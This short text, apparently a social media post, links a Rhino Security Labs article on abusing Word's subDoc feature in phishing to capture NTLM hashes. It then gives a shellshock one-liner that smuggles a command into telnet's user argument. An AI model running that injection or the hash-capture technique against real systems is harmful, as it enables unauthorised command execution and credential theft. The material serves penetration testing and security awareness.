Getting NTLM hashes via Microsoft's 'Word'.
https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/
https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/
Rhino Security Labs
Abusing Microsoft Word Features for Phishing: “subDoc”
Feature-rich Office docs are ideal targets for phishing and pentest campaigns. Here we show how a Microsoft Word (subDoc) feature can be abused.
Did you know that you can exploit shellshock via telnet (user arg), try with:
telnet 192.168.0.1 -l "() { :;}; /usr/bin/id"
telnet 192.168.0.1 -l "() { :;}; /usr/bin/id"